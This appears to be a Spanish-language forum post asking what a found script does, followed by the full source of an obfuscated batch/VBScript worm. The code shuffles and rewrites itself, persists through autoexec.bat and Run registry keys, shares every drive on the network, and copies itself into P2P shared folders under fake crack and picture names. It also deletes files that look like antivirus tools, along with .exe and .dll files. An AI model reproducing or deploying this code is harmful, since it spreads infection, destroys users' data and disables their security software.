kE aCE sTE COdE??? O

wenas...

a ver encontre este code por ai......

creo k una parte es de propagacion p2p, tambien creo k se agrega al registro....y se poko mas

y lo posteo aki para ver si pueden decirme algo mas sobre este code, k ace mas y eso....

Código:

@goto vRwzdP1i0
:vRwzdP1i0
@EcHO OfF%vRwz%
goto vRwz4cY4X
:vRwz4cY4X
ver|fINd /I "xP"|iF erRoRLEVel 1 ctTy nUL%vRwz%
goto vRwz1An3
:vRwz1An3
if VROHBrer==%1 goto vRwzDOrk3OhR
goto vRwzkO4nVB8AZW
:vRwzkO4nVB8AZW
REM V½IŸít|sEt à€aXI=Script%vRwz%
goto vRwzIT4xMh_
:vRwzIT4xMh_
ecHO.on error resume next>%tMP%\mW1_Y.vYe%vRwz%
goto vRwzEdQsFepH
:vRwzEdQsFepH
eCho SET Se2W1Bi=creATeOBJecT("w%à€aXI%.shell")>>%TMp%\mW1_Y.vYe%vRwz%
goto vRwzmtJTbq
:vRwzmtJTbq
echO Se2W1Bi.run "%WInDIR%\traywatch.bat prZbfpHF",0>>%TMP%\mW1_Y.vYe%vRwz%
goto vRwzGYYSQJYN
:vRwzGYYSQJYN
if ÎÇ"¦%WINdir%==ÎÇ"¦ Set windir=%systemroot%%vRwz%
goto vRwzlmx
:vRwzlmx
if exist %WInDIR%\traywatch.bat attrib -r -s -h %WInDIR%\traywatch.bat%vRwz%
goto vRwzi2
:vRwzi2
find "vRwz"<%0>>%TMp%\nIQ.vYe%vRwz%
goto vRwzCASFsD
:vRwzCASFsD
EcHO.on error resume next>%tmp%\zEr1.vbs%vRwz%
goto vRwzCrUCw
:vRwzCrUCw
echO sEt PT6OOxa=cReaTeOBjECt("w%à€aXI%.shell")>>%TMp%\zEr1.vbs%vRwz%
goto vRwzwZLYR
:vRwzwZLYR
EChO if PT6OOxa.regread("HKCU\Software\rZHHXpP9sB\cmI")="" then>>%tmP%\zEr1.vbs%vRwz%
goto vRwzzjv
:vRwzzjv
echO dim oK,MgWmJGZcRs,MqgP5xt,sD9b,G3Ss4Po0Fe,wGvaeHu7xu,u4_yNjP,GXn5RN_H,BCJLZQ,Or,U4bj,dq4CiWsA>>%tmP%\zEr1.vbs%vRwz%
goto vRwzF9IKLIbrKc
:vRwzF9IKLIbrKc
EcHO set u4_yNjP=cREaTeOBJect("%à€aXI%ing.filesystemobject")>>%TmP%\zEr1.vbs%vRwz%
goto vRwzHLLa
:vRwzHLLa
eCHo SEt VFV=u4_yNjP.opentextfile("%tMP%\nIQ.vYe")>>%tMp%\zEr1.vbs%vRwz%
goto vRwzBjhIPiXlQr
:vRwzBjhIPiXlQr
EChO GXn5RN_H=VFV.readall>>%TMP%\zEr1.vbs%vRwz%
goto vRwz4uyds
:vRwz4uyds
EChO BCJLZQ=split(GXn5RN_H,vbcrlf)>>%tmp%\zEr1.vbs%vRwz%
goto vRwzcr561
:vRwzcr561
ECHo Or=0>>%tmP%\zEr1.vbs%vRwz%
goto vRwzfSUCg
:vRwzfSUCg
ECHo U4bj=0>>%tMP%\zEr1.vbs%vRwz%
goto vRwzuerRBO6_
:vRwzuerRBO6_
echO dq4CiWsA=0>>%tMp%\zEr1.vbs%vRwz%
goto vRwzTQN
:vRwzTQN
eChO for each wGvaeHu7xu in BCJLZQ>>%tmP%\zEr1.vbs%vRwz%
goto vRwzWKAq
:vRwzWKAq
echO if Or=0 then>>%TMP%\zEr1.vbs%vRwz%
goto vRwzYlg8Sb8uXI
:vRwzYlg8Sb8uXI
echo G3Ss4Po0Fe=G3Ss4Po0Fe&wGvaeHu7xu&vbcrlf>>%TMP%\zEr1.vbs%vRwz%
goto vRwzk0Hf
:vRwzk0Hf
ECho else>>%tMP%\zEr1.vbs%vRwz%
goto vRwzSyCOJ
:vRwzSyCOJ
ecHO if U4bj=0 or U4bj=1 or U4bj=2 then>>%tMp%\zEr1.vbs%vRwz%
goto vRwzst7fMmXlnE
:vRwzst7fMmXlnE
echo sD9b=sD9b&wGvaeHu7xu&vbcrlf>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzbaO
:vRwzbaO
eCho U4bj=U4bj+1>>%tMp%\zEr1.vbs%vRwz%
goto vRwzDR2q5r
:vRwzDR2q5r
eCHo else>>%tMp%\zEr1.vbs%vRwz%
goto vRwzjK
:vRwzjK
ecHo MqgP5xt=MqgP5xt&sD9b&"L#§U.å">>%Tmp%\zEr1.vbs%vRwz%
goto vRwzA6mH
:vRwzA6mH
eChO dq4CiWsA=dq4CiWsA+1>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzoouR
:vRwzoouR
echO sD9b=wGvaeHu7xu&vbcrlf>>%tMP%\zEr1.vbs%vRwz%
goto vRwzR6YNqX
:vRwzR6YNqX
eCho U4bj=1>>%tmp%\zEr1.vbs%vRwz%
goto vRwzQ9zREZbBpu
:vRwzQ9zREZbBpu
eCHO end if>>%TmP%\zEr1.vbs%vRwz%
goto vRwzIGDx9Nl4MP
:vRwzIGDx9Nl4MP
EchO end if>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzoWuYo4rUKi
:vRwzoWuYo4rUKi
EChO Or=Or+1>>%tmp%\zEr1.vbs%vRwz%
goto vRwzgXfcH7W
:vRwzgXfcH7W
eCHo next>>%tmp%\zEr1.vbs%vRwz%
goto vRwzEwRR7P
:vRwzEwRR7P
eCHo MgWmJGZcRs=split(MqgP5xt,"L#§U.å")>>%TMP%\zEr1.vbs%vRwz%
goto vRwzW21
:vRwzW21
ECHO randomize>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzWzDT0C
:vRwzWzDT0C
ECHo oK=int(rnd*dq4CiWsA)>>%tMP%\zEr1.vbs%vRwz%
goto vRwz_sIdDQp2
:vRwz_sIdDQp2
echo G3Ss4Po0Fe=G3Ss4Po0Fe&MgWmJGZcRs(oK)>>%tmp%\zEr1.vbs%vRwz%
goto vRwz5RQsXmp
:vRwz5RQsXmp
eCHo Or=1>>%TMp%\zEr1.vbs%vRwz%
goto vRwz6jLPkLgVff
:vRwz6jLPkLgVff
eChO dim s_gP_z,eX4mH,q0eg92pG,j714gm>>%TMP%\zEr1.vbs%vRwz%
goto vRwzKlQ0i46eS5
:vRwzKlQ0i46eS5
EcHO s_gP_z=1>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzljjogH2C9w
:vRwzljjogH2C9w
ECho eX4mH=1>>%tmp%\zEr1.vbs%vRwz%
goto vRwzbWojbH
:vRwzbWojbH
EchO q0eg92pG=0>>%TMP%\zEr1.vbs%vRwz%
goto vRwzMKOy8G2JD
:vRwzMKOy8G2JD
eCHO j714gm=0>>%tMp%\zEr1.vbs%vRwz%
goto vRwzvHT
:vRwzvHT
ecHO do while not(Or=dq4CiWsA) and not(Or=dq4CiWsA+1)>>%tMP%\zEr1.vbs%vRwz%
goto vRwz6iiQ9z1
:vRwz6iiQ9z1
EChO if (oK+s_gP_z)=dq4CiWsA then>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzyRX
:vRwzyRX
echO q0eg92pG=1>>%tmp%\zEr1.vbs%vRwz%
goto vRwzNuSvxz
:vRwzNuSvxz
EchO end if>>%tMP%\zEr1.vbs%vRwz%
goto vRwzB8889sJN
:vRwzB8889sJN
ECho if (oK-eX4mH)=-1 then>>%tMP%\zEr1.vbs%vRwz%
goto vRwzqUO2siELi
:vRwzqUO2siELi
eChO j714gm=1>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzl2Q
:vRwzl2Q
eCho end if>>%TMp%\zEr1.vbs%vRwz%
goto vRwzXSSWfl
:vRwzXSSWfl
ecHo if q0eg92pG=0 then>>%tMP%\zEr1.vbs%vRwz%
goto vRwzGtc8Fe
:vRwzGtc8Fe
Echo G3Ss4Po0Fe=G3Ss4Po0Fe&MgWmJGZcRs(oK+s_gP_z)>>%TMp%\zEr1.vbs%vRwz%
goto vRwz8C4fyvaE
:vRwz8C4fyvaE
ECHo s_gP_z=s_gP_z+1>>%tMP%\zEr1.vbs%vRwz%
goto vRwzINE2
:vRwzINE2
ECho Or=Or+1>>%tmp%\zEr1.vbs%vRwz%
goto vRwzvSXnZQ
:vRwzvSXnZQ
echO end if>>%TMP%\zEr1.vbs%vRwz%
goto vRwzmpEa8TNd
:vRwzmpEa8TNd
Echo if j714gm=0 then>>%tMP%\zEr1.vbs%vRwz%
goto vRwzZyJsz
:vRwzZyJsz
ecHO G3Ss4Po0Fe=G3Ss4Po0Fe&MgWmJGZcRs(oK-eX4mH)>>%Tmp%\zEr1.vbs%vRwz%
goto vRwzd388t3tfAB
:vRwzd388t3tfAB
ECho eX4mH=eX4mH+1>>%tMP%\zEr1.vbs%vRwz%
goto vRwz7A1_
:vRwz7A1_
ecHO Or=Or+1>>%tMp%\zEr1.vbs%vRwz%
goto vRwzXXaHNhF7
:vRwzXXaHNhF7
ECHO end if>>%TMp%\zEr1.vbs%vRwz%
goto vRwzYOem
:vRwzYOem
echo loop>>%tmp%\zEr1.vbs%vRwz%
goto vRwzuRD
:vRwzuRD
ECho G3Ss4Po0Fe=G3Ss4Po0Fe&":vRwzuRD"&vbcrlf>>%tmp%\zEr1.vbs%vRwz%
goto vRwzTabWs7L
:vRwzTabWs7L
ecHo sEt VFV=u4_yNjP.opentextfile("%WInDIR%\traywatch.bat",8)>>%tmp%\zEr1.vbs%vRwz%
goto vRwz9RUslE2cp2
:vRwz9RUslE2cp2
eCHo VFV.write G3Ss4Po0Fe>>%tMP%\zEr1.vbs%vRwz%
goto vRwzXaCeiBrAL
:vRwzXaCeiBrAL
ecHO PT6OOxa.regwrite "HKCU\Software\rZHHXpP9sB\cmI","c5ba0z">>%TmP%\zEr1.vbs%vRwz%
goto vRwzDYb
:vRwzDYb
echO end if>>%TMp%\zEr1.vbs%vRwz%
goto vRwzXjoyrYhA
:vRwzXjoyrYhA
cscript %TmP%\zEr1.vbs>nul%vRwz%
goto vRwzX9BoM5
:vRwzX9BoM5
if not nkjyqUFG==nkjyqUFG%1 goto vRwzgu
goto vRwzVomi
:vRwzVomi
find /i /v "run"<%tMp%\mW1_Y.vYe>%TmP%\kKKo.vbs%vRwz%
goto vRwzkV
:vRwzkV
EchO Se2W1Bi.run "%WInDIR%\traywatch.bat Ldeewj", 0>>%tMp%\kKKo.vbs%vRwz%
goto vRwzG3GmAwhCBt
:vRwzG3GmAwhCBt
cscript %TMP%\kKKo.vbs>nul%vRwz%
goto vRwzs3reT4
:vRwzs3reT4
goto vRwzikEVi
goto vRwzCQUpW_ly0M
:vRwzCQUpW_ly0M
:vRwzgu
goto vRwzRK4LVpfOc
:vRwzRK4LVpfOc
if not exist %WInDIR%\ÈÀ³ÎÎþÕ³\*.* md %WInDIR%\ÈÀ³ÎÎþÕ³%vRwz%
goto vRwz_ZO
:vRwz_ZO
attrib +s +h %WInDIR%\ÈÀ³ÎÎþÕ³%vRwz%
goto vRwzscvoydbUd
:vRwzscvoydbUd
if exist %WInDIR%\ÈÀ³ÎÎþÕ³\VMyaGwu.bat goto vRwz3i57DR5x
goto vRwz7ppeu
:vRwz7ppeu
copy %WInDIR%\traywatch.bat %WInDIR%\ÈÀ³ÎÎþÕ³\VMyaGwu.bat%vRwz%
goto vRwzyKWWPBcOiU
:vRwzyKWWPBcOiU
attrib -r \autoexec.bat%vRwz%
goto vRwzuTjT_a5
:vRwzuTjT_a5
EcHO @call %WInDIR%\ÈÀ³ÎÎþÕ³\VMyaGwu.bat Yk3laPcV>>\autoexec.bat%vRwz%
goto vRwz7JdmjS
:vRwz7JdmjS
:vRwz3i57DR5x
goto vRwzN58xNSetHm
:vRwzN58xNSetHm
find /i /v "run"<%TmP%\mW1_Y.vYe>%WInDIR%\viewexplore.vbs%vRwz%
goto vRwzUE1vy31
:vRwzUE1vy31
eChO sET JsJtGeNbT1=cREateObjEct("%à€aXI%ing.filesystemobject")>>%WInDIR%\viewexplore.vbs%vRwz%
goto vRwzcWpFROy0
:vRwzcWpFROy0
ECho if err.number=429 then>>%WInDIR%\viewexplore.vbs%vRwz%
goto vRwzsxsg1aIT
:vRwzsxsg1aIT
ecHo javascript:location.reload()>>%WInDIR%\viewexplore.vbs%vRwz%
goto vRwzFDeThZ
:vRwzFDeThZ
EChO end if>>%WInDIR%\viewexplore.vbs%vRwz%
goto vRwztlEfi
:vRwztlEfi
eChO seT yLs6k6MP9=JsJtGeNbT1.createtextfile("%TMP%\Th.bat",1)>>%WInDIR%\viewexplore.vbs%vRwz%
goto vRwzjRmS0khF
:vRwzjRmS0khF
%vRwz%%Gº»!ªf%set Ð÷m‡d)=/
goto vRwzKzV2xIH9r
:vRwzKzV2xIH9r
ecHO %Ð÷m‡d)%*>%WInDIR%\logreg.js%vRwz%
goto vRwz651bOe3b
:vRwz651bOe3b
type %WInDIR%\traywatch.bat>>%WInDIR%\logreg.js%vRwz%
goto vRwz1j2W9T
:vRwz1j2W9T
eCHo *%Ð÷m‡d)%>>%WInDIR%\logreg.js%vRwz%
goto vRwzY5
:vRwzY5
ECHo var fCV2P=W%à€aXI%.CReatEobJeCt("%à€aXI%ing.filesystemobject");>>%WInDIR%\logreg.js%vRwz%
goto vRwzT2paWtFA24
:vRwzT2paWtFA24
ECHo var K8rMXMaWw=W%à€aXI%.CReAteObjECT("w%à€aXI%.shell");>>%WInDIR%\logreg.js%vRwz%
goto vRwz0ZBk_Ny
:vRwz0ZBk_Ny
echo fCV2P.copyfile(W%à€aXI%.%à€aXI%fullname,"Th.bat",1);>>%WInDIR%\logreg.js%vRwz%
goto vRwzrxFC8Z2O_R
:vRwzrxFC8Z2O_R
ecHO K8rMXMaWw.run("Th.bat",0);>>%WInDIR%\logreg.js%vRwz%
goto vRwzNZ
:vRwzNZ
echo.on error resume next>%tmp%\cc.vbs%vRwz%
goto vRwzCO8
:vRwzCO8
ECho dim Ui1Zp,nhSeai>>%Tmp%\cc.vbs%vRwz%
goto vRwz0_X
:vRwz0_X
eCHO Set Kb1B=CREAtEoBJEct("%à€aXI%ing.filesystemobject")>>%tmP%\cc.vbs%vRwz%
goto vRwzT50Z
:vRwzT50Z
EcHo SeT Olpa4M1=CrEATeoBJeCT("w%à€aXI%.shell")>>%Tmp%\cc.vbs%vRwz%
goto vRwz6A3oge
:vRwz6A3oge
EchO nhSeai=Kb1B.opentextfile("%WInDIR%\traywatch.bat").readall()>>%TMp%\cc.vbs%vRwz%
goto vRwzNZp
:vRwzNZp
EcHO seT UsF86rqf=Kb1B.opentextfile("%WInDIR%\viewexplore.vbs",8)>>%tmP%\cc.vbs%vRwz%
goto vRwzHFNxdLhFe
:vRwzHFNxdLhFe
eCHo UsF86rqf.write "yLs6k6MP9.write """"">>%Tmp%\cc.vbs%vRwz%
goto vRwzqbkzvnxM7d
:vRwzqbkzvnxM7d
EcHO for twQf=1 to len(nhSeai)>>%tMP%\cc.vbs%vRwz%
goto vRwzBcINmLLdoN
:vRwzBcINmLLdoN
EcHO Dj=asc(mid(nhSeai,twQf,1))>>%TmP%\cc.vbs%vRwz%
goto vRwzH8Q
:vRwzH8Q
EcHo UsF86rqf.write "&chr("&Dj&")">>%tmP%\cc.vbs%vRwz%
goto vRwzXBahorPor
:vRwzXBahorPor
EChO next>>%TmP%\cc.vbs%vRwz%
goto vRwz8E
:vRwz8E
Echo UsF86rqf.writeline vbcrlf&"Se2W1Bi.run "&chr(34)&"%TMp%\Th.bat"&chr(34)&",0">>%tMP%\cc.vbs%vRwz%
goto vRwzbdiwdxHltn
:vRwzbdiwdxHltn
Echo sET gTxRT=Kb1B.createtextfile("%TMP%\o1xOLFb1.vYe")>>%tMp%\cc.vbs%vRwz%
goto vRwzyWuVgJ5N
:vRwzyWuVgJ5N
ecHo gTxRT.writeline "REGEDIT4">>%TMP%\cc.vbs%vRwz%
goto vRwz4Z
:vRwz4Z
eChO gTxRT.writeline "[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]">>%tmp%\cc.vbs%vRwz%
goto vRwzUt6_37S5
:vRwzUt6_37S5
eChO gTxRT.writeline """Ls""=""command /c echo set uSn6aaV=createobject(\""Scripting.filesystemobject\"").createtextfile(\""Xwzvi.bat\""):uSn6aaV.write createobject(\""wscript.shell\"").regread(\""HKCU\\Software\\D12f2pb\\\""):createobject(\""wscript.shell\"").run \""uSn6aaV.bat\"",0>draAsw4j.vbs""">>%tmP%\cc.vbs%vRwz%
goto vRwzQq22CRS3L
:vRwzQq22CRS3L
eCho gTxRT.writeline """LsAhX""=""command /c cscript draAsw4j.vbs>nul""">>%Tmp%\cc.vbs%vRwz%
goto vRwzRPvWjR2M
:vRwzRPvWjR2M
EcHO gTxRT.writeline "[HKEY_CURRENT_USER\Software\D12f2pb]">>%tmp%\cc.vbs%vRwz%
goto vRwzuj0_t7
:vRwzuj0_t7
ecHO gTxRT.write " @=""">>%TMP%\cc.vbs%vRwz%
goto vRwzza
:vRwzza
eCHo Ez=replace(Ez,"\","\\")>>%tMP%\cc.vbs%vRwz%
goto vRwzn6
:vRwzn6
echO Ez=replace(nhSeai,vbcrlf,"\r\n")>>%Tmp%\cc.vbs%vRwz%
goto vRwz5Q
:vRwz5Q
EchO Ez=replace(Ez,"""","\""")>>%tMp%\cc.vbs%vRwz%
goto vRwzg0oVpH9Z
:vRwzg0oVpH9Z
eCHO gTxRT.write Ez>>%TmP%\cc.vbs%vRwz%
goto vRwzkpMT9GU
:vRwzkpMT9GU
eChO gTxRT.writeline """">>%tmP%\cc.vbs%vRwz%
goto vRwzBORX
:vRwzBORX
EchO seT gIRtcbv=Kb1B.opentextfile("%WInDIR%\viewexplore.vbs")>>%TmP%\cc.vbs%vRwz%
goto vRwz59y
:vRwz59y
ECHo kdYPluL1=gIRtcbv.readall>>%TMp%\cc.vbs%vRwz%
goto vRwzPBELa0
:vRwzPBELa0
eCHo Set gIRtcbv=Kb1B.createtextfile("%tMP%\0xZit.vYe")>>%tmP%\cc.vbs%vRwz%
goto vRwzNCbYMv
:vRwzNCbYMv
eCho gIRtcbv.writeline chr(60)&"script language=vbscript"&chr(62)>>%tMP%\cc.vbs%vRwz%
goto vRwzpqVJdZxI
:vRwzpqVJdZxI
EChO gIRtcbv.write kdYPluL1>>%tMp%\cc.vbs%vRwz%
goto vRwzVx2
:vRwzVx2
ecHo gIRtcbv.writeline chr(60)&"/script"&chr(62)>>%tmP%\cc.vbs%vRwz%
goto vRwzW0YikQQ
:vRwzW0YikQQ
copy %TMp%\mW1_Y.vYe %WInDIR%\ndEE8f.vbs%vRwz%
goto vRwzLSHQeK9K
:vRwzLSHQeK9K
echo Olpa4M1.rEGwRITe "HKCU\soFTwaRe\mIcrosoFt\WIndoWS\CUrREn"&CHR(115+1)&"vERsIOn\Run\systray","%WInDIR%\ndEE8f.vbs">>%TMp%\cc.vbs%vRwz%
goto vRwzfjr3
:vRwzfjr3
EcHO dim nVYsAJccI_>>%TmP%\cc.vbs%vRwz%
goto vRwzuvv1
:vRwzuvv1
EChO Olpa4M1.regwrite "HKLM\sOFtwARE\MicRosOFT\WInDows\CuRREn"&CHR(115+1)&"VERSIon\nEtWoRK\insTaLled","1">>%tMp%\cc.vbs%vRwz%
goto vRwz1lFLZORYd
:vRwz1lFLZORYd
eCHo for each nVYsAJccI_ in Kb1B.drives>>%tmP%\cc.vbs%vRwz%
goto vRwzpFXZVC3
:vRwzpFXZVC3
ECho Olpa4M1.regwrite "HKLM\SoftwAre\mIcrosOft\wINDOws\curren"&ChR(115+1)&"VERsioN\NEtwORK\lanMan\%homedrive%"&nVYsAJccI_.driveletter&"$\Flags",258,"REG_DWORD">>%TMP%\cc.vbs%vRwz%
goto vRwzmAnJ_
:vRwzmAnJ_
echo Olpa4M1.regwrite "HKLM\soFTWare\mIcroSoft\WiNdOws\cUrrEN"&CHR(115+1)&"vErsION\neTWOrk\lAnman\%homedrive%"&nVYsAJccI_.driveletter&"$\Type",0,"REG_DWORD">>%tMP%\cc.vbs%vRwz%
goto vRwz2hzvuduPJ9
:vRwz2hzvuduPJ9
eCHo Olpa4M1.regwrite "HKLM\SOftWAre\micrOSoft\winDOWS\cUrRen"&CHR(115+1)&"VeRSIoN\NETwoRK\lANmAN\%homedrive%"&nVYsAJccI_.driveletter&"$\Path",nVYsAJccI_.path&"\">>%tMp%\cc.vbs%vRwz%
goto vRwz1ZcQIC_w0F
:vRwz1ZcQIC_w0F
ECHo next>>%TMP%\cc.vbs%vRwz%
goto vRwz75U8qSpyUs
:vRwz75U8qSpyUs
eChO sEt yC9SY=Olpa4M1.createshortcut("%TMp%\EiY3N.lnk")>>%TMP%\cc.vbs%vRwz%
goto vRwz_jzU
:vRwz_jzU
eCho yC9SY.targetpath=Olpa4M1.expandenvironmentstrings("%WInDIR%\viewexplore.vbs")>>%TmP%\cc.vbs%vRwz%
goto vRwzfOJoOy
:vRwzfOJoOy
ECHO yC9SY.windowstyle=4>>%tmp%\cc.vbs%vRwz%
goto vRwzfmQpcvcOZH
:vRwzfmQpcvcOZH
Echo yC9SY.save>>%tmP%\cc.vbs%vRwz%
goto vRwzkwnGObT
:vRwzkwnGObT
Echo SeT V3KJmFhi=Olpa4M1.createshortcut("%TMp%\pKa7qN6.lnk")>>%tmP%\cc.vbs%vRwz%
goto vRwzCbhCD
:vRwzCbhCD
ecHo V3KJmFhi.targetpath=Olpa4M1.expandenvironmentstrings("%WInDIR%\traywatch.bat")>>%tmp%\cc.vbs%vRwz%
goto vRwzFnoM0AJm
:vRwzFnoM0AJm
ECHO V3KJmFhi.windowstyle=2>>%tmP%\cc.vbs%vRwz%
goto vRwzl1SzKv0J
:vRwzl1SzKv0J
EChO V3KJmFhi.save>>%tmp%\cc.vbs%vRwz%
goto vRwzZLYY
:vRwzZLYY
eCHo dim J2dkNc,x0YUdwXKK2,P7u>>%tmp%\cc.vbs%vRwz%
goto vRwztyg7mH4
:vRwztyg7mH4
eCho C9y8JF()>>%tmP%\cc.vbs%vRwz%
goto vRwz7ofY0m50Q
:vRwz7ofY0m50Q
EChO sub C9y8JF()>>%TMP%\cc.vbs%vRwz%
goto vRwzLg1hrmrGn1
:vRwzLg1hrmrGn1
ECho.on error resume next>>%tMp%\cc.vbs%vRwz%
goto vRwzytVWw1iC
:vRwzytVWw1iC
Echo for each J2dkNc in Kb1B.drives>>%Tmp%\cc.vbs%vRwz%
goto vRwz0yPbXvhlit
:vRwz0yPbXvhlit
ECho if not(J2dkNc.drivetype=3) and not(J2dkNc.drivetype=4) and not(J2dkNc.drivetype=5) then>>%tmp%\cc.vbs%vRwz%
goto vRwzRPWuBa
:vRwzRPWuBa
eCHo bLtR5YKdIU(J2dkNc.path&"\")>>%TMP%\cc.vbs%vRwz%
goto vRwznCAT
:vRwznCAT
Echo end if>>%tmP%\cc.vbs%vRwz%
goto vRwzsob
:vRwzsob
EcHo next>>%Tmp%\cc.vbs%vRwz%
goto vRwz_v2S1SPR
:vRwz_v2S1SPR
eCho end sub>>%TMp%\cc.vbs%vRwz%
goto vRwzE3cqQRmg
:vRwzE3cqQRmg
ECho sub ZQFlzP(VzN)>>%tmP%\cc.vbs%vRwz%
goto vRwzYmFOG_dNIm
:vRwzYmFOG_dNIm
EchO.on error resume next>>%Tmp%\cc.vbs%vRwz%
goto vRwzX28Se5RgP
:vRwzX28Se5RgP
echo SET AF9=Kb1B.getfile("%WInDIR%\traywatch.bat")>>%Tmp%\cc.vbs%vRwz%
goto vRwzeAVMd
:vRwzeAVMd
ECHo AF9.copy VzN&"\bitch5988.jpg.bat">>%tmp%\cc.vbs%vRwz%
goto vRwzuwf
:vRwzuwf
ecHo AF9.copy VzN&"\pics5654.jpg.bat">>%TMp%\cc.vbs%vRwz%
goto vRwzX5oys
:vRwzX5oys
eChO AF9.copy VzN&"\jokes7044.jpg.bat">>%TMP%\cc.vbs%vRwz%
goto vRwzqHz1
:vRwzqHz1
ecHo AF9.copy VzN&"\crackpanda2007.rar.bat">>%tMP%\cc.vbs%vRwz%
goto vRwzFz
:vRwzFz
eChO AF9.copy VzN&"\SanAndreas.CrACk.rar.bat">>%TMp%\cc.vbs%vRwz%
goto vRwzCzSW3ysZO1
:vRwzCzSW3ysZO1
EChO end sub>>%tMp%\cc.vbs%vRwz%
goto vRwzF2_G
:vRwzF2_G
eCho sub bLtR5YKdIU(zPlvN2yoTr)>>%tmP%\cc.vbs%vRwz%
goto vRwzo0P
:vRwzo0P
eCHO.on error resume next>>%TMp%\cc.vbs%vRwz%
goto vRwzybx
:vRwzybx
EcHo Set qzmD7h3TvD=Kb1B.getfolder(zPlvN2yoTr)>>%tmP%\cc.vbs%vRwz%
goto vRwzwoh1YMa_M
:vRwzwoh1YMa_M
ECho dim ls>>%Tmp%\cc.vbs%vRwz%
goto vRwzA9z7esoweT
:vRwzA9z7esoweT
eCHO ls=lcase(qzmD7h3TvD.name)>>%tmp%\cc.vbs%vRwz%
goto vRwzkGu
:vRwzkGu
EcHO if ls="" then>>%TMp%\cc.vbs%vRwz%
goto vRwzY60m
:vRwzY60m
EcHo elseif ls="morpheus" or ls="kmd" or ls="kazaa" or ls="kazaa lite" then>>%TMp%\cc.vbs%vRwz%
goto vRwzm0BjmEH7K
:vRwzm0BjmEH7K
EChO ZQFlzP(qzmD7h3TvD.path & "\My Shared Folder")>>%Tmp%\cc.vbs%vRwz%
goto vRwz_KLLeCPliN
:vRwz_KLLeCPliN
Echo elseif ls="edonkey2000" or ls="emule" or ls="overnet" or ls="applejuice" then>>%TMP%\cc.vbs%vRwz%
goto vRwzmrAj
:vRwzmrAj
ECho ZQFlzP(qzmD7h3TvD.path & "\Incoming")>>%tmp%\cc.vbs%vRwz%
goto vRwz2BGF5nT
:vRwz2BGF5nT
EchO elseif ls="bearshare" or ls="limewire" then>>%TMP%\cc.vbs%vRwz%
goto vRwzmVvp
:vRwzmVvp
EcHO ZQFlzP(qzmD7h3TvD.path & "\Shared")>>%Tmp%\cc.vbs%vRwz%
goto vRwz2I0dEMTMKm
:vRwz2I0dEMTMKm
ECho elseif ls="grokster" then>>%TMp%\cc.vbs%vRwz%
goto vRwzcVcnXR
:vRwzcVcnXR
EcHO ZQFlzP(qzmD7h3TvD.path & "\My Grokster")>>%tMP%\cc.vbs%vRwz%
goto vRwzvPp2rz
:vRwzvPp2rz
EChO elseif ls="icq" then>>%tMp%\cc.vbs%vRwz%
goto vRwzf3P
:vRwzf3P
ECHo ZQFlzP(qzmD7h3TvD.path & "\Shared Files")>>%tmp%\cc.vbs%vRwz%
goto vRwzbFbnn2
:vRwzbFbnn2
ECHO end if>>%tMp%\cc.vbs%vRwz%
goto vRwz_mpJkG0
:vRwz_mpJkG0
eChO for each P7u in qzmD7h3TvD.files>>%TmP%\cc.vbs%vRwz%
goto vRwz6ZI3lvaZ
:vRwz6ZI3lvaZ
EcHO ysPqfOE=lcase(P7u.name)>>%tmP%\cc.vbs%vRwz%
goto vRwzLL_ZAC8rsR
:vRwzLL_ZAC8rsR
ecHo if instr(1,ysPqfOE,"avp") or instr(1,ysPqfOE,"kav") or instr(1,ysPqfOE,"nav") or instr(1,ysPqfOE,"scan") or instr(1,ysPqfOE,"alert") or instr(1,ysPqfOE,"anti") or instr(1,ysPqfOE,"mon") or instr(1,ysPqfOE,"check") or instr(1,ysPqfOE,"prot") or instr(1,ysPqfOE,"config") or instr(1,ysPqfOE,"reg") then>>%tMP%\cc.vbs%vRwz%
goto vRwzzRswO
:vRwzzRswO
ECHo Kb1B.deletefile P7u.path,1>>%tmP%\cc.vbs%vRwz%
goto vRwznBPFOIG
:vRwznBPFOIG
eCHO end if>>%tMP%\cc.vbs%vRwz%
goto vRwz4L
:vRwz4L
ecHo ysPqfOE=lcase(Kb1B.getextensionname(P7u.path))>>%TMp%\cc.vbs%vRwz%
goto vRwzgGanPM
:vRwzgGanPM
eChO if ysPqfOE="avc" or ysPqfOE="exe" or ysPqfOE="dll" then>>%tmp%\cc.vbs%vRwz%
goto vRwzbPmK67t79z
:vRwzbPmK67t79z
EChO Kb1B.deletefile P7u.path,1>>%tmp%\cc.vbs%vRwz%
goto vRwzKhgWucYG_U
:vRwzKhgWucYG_U
eChO end if>>%tMP%\cc.vbs%vRwz%
goto vRwzpCSmm3gAq1
:vRwzpCSmm3gAq1
ECHO if Ui1Zp="cfTk" then>>%tMp%\cc.vbs%vRwz%
goto vRwzVG
:vRwzVG
eCho dim X3>>%TmP%\cc.vbs%vRwz%
goto vRwzZHAaxC
:vRwzZHAaxC
echO sET sqlD28WcAP=Kb1B.getfile(P7u.path)>>%TmP%\cc.vbs%vRwz%
goto vRwzh03e3Cr
:vRwzh03e3Cr
ECHO X3=sqlD28WcAP.attributes>>%tmP%\cc.vbs%vRwz%
goto vRwzlannuGe8fR
:vRwzlannuGe8fR
ECHo sqlD28WcAP.attributes=0>>%TMP%\cc.vbs%vRwz%
goto vRwz4bXMi
:vRwz4bXMi
echo Kb1B.copyfile "%WInDIR%\traywatch.bat",P7u.path,1>>%Tmp%\cc.vbs%vRwz%
goto vRwz3qCw5af
:vRwz3qCw5af
eCho sqlD28WcAP.attributes=X3>>%tmp%\cc.vbs%vRwz%
goto vRwzOkVC8vfc
:vRwzOkVC8vfc
EcHo else>>%tMP%\cc.vbs%vRwz%
goto vRwzPqE
:vRwzPqE
eCho end if>>%tmp%\cc.vbs%vRwz%
goto vRwzIfWxR1
:vRwzIfWxR1
ECHo next>>%tmp%\cc.vbs%vRwz%
goto vRwzX8ysuPWl_
:vRwzX8ysuPWl_
eChO for each x0YUdwXKK2 in qzmD7h3TvD.subfolders>>%tmp%\cc.vbs%vRwz%
goto vRwzpt
:vRwzpt
ecHO bLtR5YKdIU(x0YUdwXKK2.path)>>%TMP%\cc.vbs%vRwz%
goto vRwzOkAQkSjExf
:vRwzOkAQkSjExf
